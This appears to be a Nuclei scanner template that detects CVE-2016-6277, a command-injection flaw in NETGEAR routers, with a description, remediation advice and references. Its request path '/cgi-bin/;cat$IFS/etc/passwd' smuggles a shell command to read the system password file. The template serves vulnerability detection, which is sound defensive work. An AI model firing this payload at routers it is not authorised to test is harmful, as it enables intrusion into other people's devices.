46 lines
2.0 KiB
YAML
46 lines
2.0 KiB
YAML
id: CVE-2016-6277
|
|
|
|
info:
|
|
name: NETGEAR Routers - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: high
|
|
description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise.
|
|
remediation: |
|
|
Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
|
|
- http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
|
- https://www.kb.cert.org/vuls/id/582384
|
|
- http://kb.netgear.com/000036386/CVE-2016-582384
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2016-6277
|
|
cwe-id: CWE-352
|
|
epss-score: 0.97464
|
|
epss-percentile: 0.9996
|
|
cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: netgear
|
|
product: d6220_firmware
|
|
tags: cve2016,cve,netgear,rce,iot,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502205b219494263614b882b91badcb1fa30b4b9d68ad57c90001d4439fed26dbaacd0221009b1a8d86efd5251ef6612985e55dc7136fc3f386dcb718907aa4e0b7c6f95e11:922c64590222798bb761d5b6d8e72950 |